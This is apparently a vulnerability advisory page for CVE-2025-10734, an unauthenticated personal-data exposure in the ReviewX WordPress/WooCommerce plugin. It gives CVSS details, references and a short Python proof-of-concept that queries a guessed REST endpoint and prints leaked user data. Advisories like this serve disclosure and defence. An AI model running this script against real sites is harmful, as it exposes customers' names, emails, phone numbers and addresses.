Security Vulnerability Report

CVE-2025-10734 (CVSS 5.3, MEDIUM)

Published: 2026-03-23 06:16:18
Last Modified: 2026-04-24 16:32:54

Description

The ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.12 via the syncedData function. This makes it possible for unauthenticated attackers to extract sensitive data including user names, emails, phone numbers, and addresses.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

ReviewX <= 2.2.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json


def check_vulnerability(target_url):
    """
    Exploit for CVE-2025-10734 (Sensitive Information Exposure)
    This script attempts to fetch sensitive data from the syncedData endpoint.
    """
    # The endpoint path might vary based on plugin configuration, typically under wp-json
    endpoint = "/wp-json/reviewx/v1/syncedData"
    full_url = f"{target_url.rstrip('/')}{endpoint}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    try:
        response = requests.get(full_url, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Target is vulnerable: {full_url}")
            print("[+] Leaked Data:")
            try:
                data = response.json()
                print(json.dumps(data, indent=2))
            except json.JSONDecodeError:
                print(response.text)
        else:
            print(f"[-] Target appears not vulnerable or endpoint changed. Status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")


if __name__ == "__main__":
    target = "http://example.com"  # Replace with the actual target URL
    check_vulnerability(target)
```

References

https://plugins.trac.wordpress.org/browser/reviewx/tags/2.2.7/app/Rest/Controllers/DataSyncController.php#L77
https://www.wordfence.com/threat-intel/vulnerabilities/id/eb830ad3-50ba-4dfe-becb-351b227706c1?source=cve

Weakness: CWE-922